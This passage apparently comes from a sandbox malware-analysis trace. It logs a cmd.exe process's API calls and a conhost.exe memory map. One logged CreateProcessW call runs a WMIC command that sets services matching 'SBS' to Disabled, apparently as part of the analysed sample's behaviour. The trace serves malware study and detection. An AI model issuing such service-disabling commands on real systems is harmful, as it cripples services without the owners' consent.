lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x30f740 | out: lpFindFileData=0x30f740) returned 0x44205c8 [0123.522] FindClose (in: hFindFile=0x44205c8 | out: hFindFile=0x44205c8) returned 1 [0123.522] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0123.522] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0123.522] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0123.522] GetEnvironmentStringsW () returned 0x4427df8* [0123.522] FreeEnvironmentStringsA (penv="=") returned 1 [0123.522] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0123.523] GetConsoleOutputCP () returned 0x1b5 [0123.523] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0123.523] GetUserDefaultLCID () returned 0x409 [0123.523] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0123.523] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30faf4, cchData=128 | out: lpLCData="0") returned 2 [0123.523] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30faf4, cchData=128 | out: lpLCData="0") returned 2 [0123.523] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30faf4, cchData=128 | out: lpLCData="1") returned 2 [0123.523] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0123.523] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0123.523] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0123.523] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0123.523] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0123.523] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0123.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0123.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0123.524] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0123.524] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0123.524] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0123.524] GetConsoleTitleW (in: lpConsoleTitle=0x442aae0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0123.525] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0123.525] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0123.525] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0123.525] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0123.525] GetEnvironmentVariableW (in: lpName="SBS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0123.525] _wcsicmp (_String1="SBS", _String2="CD") returned 16 [0123.525] _wcsicmp (_String1="SBS", _String2="ERRORLEVEL") returned 14 [0123.525] _wcsicmp (_String1="SBS", _String2="CMDEXTVERSION") returned 16 [0123.525] _wcsicmp (_String1="SBS", _String2="CMDCMDLINE") returned 16 [0123.525] _wcsicmp (_String1="SBS", _String2="DATE") returned 15 [0123.525] _wcsicmp (_String1="SBS", _String2="TIME") returned -1 [0123.525] _wcsicmp (_String1="SBS", _String2="RANDOM") returned 1 [0123.525] _wcsicmp (_String1="SBS", _String2="HIGHESTNUMANODENUMBER") returned 11 [0123.526] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0123.526] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0123.526] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0123.526] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0123.526] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0123.526] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0123.526] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0123.527] GetConsoleTitleW (in: lpConsoleTitle=0x30f7e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0123.527] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0123.527] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0123.527] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0123.527] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0123.527] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0123.527] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0123.527] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0123.527] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0123.528] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0123.528] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0123.528] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0123.528] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0123.528] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0123.528] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0123.528] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0123.528] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0123.528] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0123.528] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0123.528] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0123.528] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0123.528] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0123.528] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0123.528] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0123.528] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0123.528] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0123.528] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0123.528] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0123.528] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0123.528] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0123.528] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0123.528] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0123.528] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0123.528] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0123.528] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0123.528] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0123.528] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0123.528] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0123.528] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0123.528] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0123.528] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0123.528] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0123.528] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0123.528] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0123.528] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0123.528] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0123.528] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0123.528] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0123.528] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0123.528] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0123.528] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0123.528] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0123.528] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0123.528] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0123.528] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0123.528] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0123.528] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0123.528] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0123.528] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0123.528] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0123.528] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0123.528] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0123.528] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0123.528] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0123.528] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0123.528] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0123.529] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0123.529] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0123.529] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0123.529] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0123.529] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0123.529] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0123.529] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0123.529] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0123.529] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0123.529] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0123.529] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0123.529] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0123.529] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0123.529] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0123.529] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0123.529] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0123.529] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0123.529] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0123.529] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0123.529] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0123.529] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0123.529] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0123.529] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0123.529] SetErrorMode (uMode=0x0) returned 0x0 [0123.529] SetErrorMode (uMode=0x1) returned 0x0 [0123.529] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x44205d0, lpFilePart=0x30f2ec | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x30f2ec*="Desktop") returned 0x1d [0123.529] SetErrorMode (uMode=0x0) returned 0x1 [0123.529] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0123.529] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0123.536] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x30f078, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f078) returned 0xffffffff [0123.536] GetLastError () returned 0x2 [0123.536] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x30f078, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f078) returned 0xffffffff [0123.536] GetLastError () returned 0x2 [0123.536] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x30f078, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f078) returned 0xffffffff [0123.536] GetLastError () returned 0x2 [0123.536] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x30f078, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f078) returned 0xffffffff [0123.536] GetLastError () returned 0x2 [0123.536] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x30f078, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f078) returned 0x442b420 [0123.537] FindClose (in: hFindFile=0x442b420 | out: hFindFile=0x442b420) returned 1 [0123.537] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x30f078, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f078) returned 0xffffffff [0123.537] GetLastError () returned 0x2 [0123.537] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x30f078, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f078) returned 0x442b420 [0123.537] FindClose (in: hFindFile=0x442b420 | out: hFindFile=0x442b420) returned 1 [0123.537] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0123.537] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0123.537] GetConsoleTitleW (in: lpConsoleTitle=0x30f56c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0123.537] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f498, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f47c | out: lpAttributeList=0x30f498, lpSize=0x30f47c) returned 1 [0123.537] UpdateProcThreadAttribute (in: lpAttributeList=0x30f498, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f484, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f498, lpPreviousValue=0x0) returned 1 [0123.537] GetStartupInfoW (in: lpStartupInfo=0x30f4d0 | out: lpStartupInfo=0x30f4d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0123.537] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0123.537] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0123.537] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0123.537] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0123.537] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0123.537] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0123.537] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0123.538] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0123.538] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0123.539] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x30f420*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f46c | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x30f46c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xbc0, dwThreadId=0xc34)) returned 1 [0123.545] CloseHandle (hObject=0xa4) returned 1 [0123.545] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0123.545] GetEnvironmentStringsW () returned 0x4429f60* [0123.545] FreeEnvironmentStringsA (penv="=") returned 1 [0123.545] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0124.593] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x30f404 | out: lpExitCode=0x30f404*=0x0) returned 1 [0124.594] CloseHandle (hObject=0xa8) returned 1 [0124.594] _vsnwprintf (in: _Buffer=0x30f4ec, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f40c | out: _Buffer="00000000") returned 8 [0124.594] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0124.594] GetEnvironmentStringsW () returned 0x4427df8* [0124.594] FreeEnvironmentStringsA (penv="=") returned 1 [0124.594] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0124.594] GetEnvironmentStringsW () returned 0x4427df8* [0124.594] FreeEnvironmentStringsA (penv="=") returned 1 [0124.594] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f498 | out: lpAttributeList=0x30f498) [0124.594] _get_osfhandle (_FileHandle=1) returned 0x3c [0124.594] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0124.595] _get_osfhandle (_FileHandle=1) returned 0x3c [0124.595] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0124.595] _get_osfhandle (_FileHandle=0) returned 0x38 [0124.595] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0124.595] SetConsoleInputExeNameW () returned 0x1 [0124.595] GetConsoleOutputCP () returned 0x1b5 [0124.595] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0124.595] SetThreadUILanguage (LangId=0x0) returned 0x409 [0124.595] exit (_Code=0) Thread: id = 332 os_tid = 0xc2c Process: id = "77" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x76f45000" os_pid = "0xc74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "76" os_parent_pid = "0xc6c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4997 start_va = 0x7f3b2000 end_va = 0x7f3b2fff entry_point = 0x0 region_type = private name = "private_0x000000007f3b2000" filename = "" Region: id = 4998 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4999 start_va = 0xd6e060000 end_va = 0xd6e07ffff entry_point = 0x0 region_type = private name = "private_0x0000000d6e060000" filename = "" Region: id = 5000 start_va = 0xd6e080000 end_va = 0xd6e093fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d6e080000" filename = "" Region: id = 5001 start_va = 0xd6e0a0000 end_va = 0xd6e0dffff entry_point = 0x0 region_type = private name = "private_0x0000000d6e0a0000" filename = "" Region: id = 5002 start_va = 0x7df5ff230000 end_va = 0x7ff5ff22ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff230000" filename = "" Region: id = 5003 start_va = 0x7ff6c3ff0000 end_va = 0x7ff6c4012fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3ff0000" filename = "" Region: id = 5004 start_va = 0x7ff6c401b000 end_va = 0x7ff6c401bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c401b000" filename = "" Region: id = 5005 start_va = 0x7ff6c401e000 end_va = 0x7ff6c401ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c401e000" filename = "" Region: id = 5006 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 5007 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5008 start_va = 0xd6e140000 end_va = 0xd6e23ffff entry_point = 0x0 region_type = private name = "private_0x0000000d6e140000" filename = "" Region: id = 5009 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5010 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5011 start_va = 0xd6e060000 end_va = 0xd6e06ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d6e060000" filename = "" Region: id = 5012 start_va = 0xd6e070000 end_va = 0xd6e076fff entry_point = 0x0 region_type = private name = "private_0x0000000d6e070000" filename = "" Region: id = 5013 start_va = 0xd6e0e0000 end_va = 0xd6e11ffff entry_point = 0x0 region_type = private name = "private_0x0000000d6e0e0000" filename = "" Region: id = 5014 start_va = 0xd6e120000 end_va = 0xd6e120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d6e120000" filename = "" Region: id = 5015 start_va = 0xd6e130000 end_va = 0xd6e136fff entry_point = 0x0 region_type = private name = "private_0x0000000d6e130000" filename = "" Region: id = 5016 start_va = 0xd6e240000 end_va = 0xd6e2fdfff entry_point = 0xd6e240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5017 start_va = 0xd6e300000 end_va = 0xd6e300fff entry_point = 0x0 region_type = private name = "private_0x0000000d6e300000" filename = "" Region: id = 5018 start_va = 0xd6e310000 end_va = 0xd6e310fff entry_point = 0x0 region_type = private name = "private_0x0000000d6e310000" filename = "" Region: id = 5019 start_va = 0xd6e3f0000 end_va = 0xd6e3fffff entry_point = 0x0 region_type = private name = "private_0x0000000d6e3f0000" filename = "" Region: id = 5020 start_va = 0xd6e400000 end_va = 0xd6e587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d6e400000" filename = "" Region: id = 5021 start_va = 0xd6e590000 end_va = 0xd6e710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d6e590000" filename = "" Region: id = 5022 start_va = 0xd6e720000 end_va = 0xd6fb1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d6e720000" filename = "" Region: id = 5023 start_va = 0x7ff6c3ef0000 end_va = 0x7ff6c3feffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3ef0000" filename = "" Region: id = 5024 start_va = 0x7ff6c401c000 end_va = 0x7ff6c401dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c401c000" filename = "" Region: id = 5025 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 5026 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = 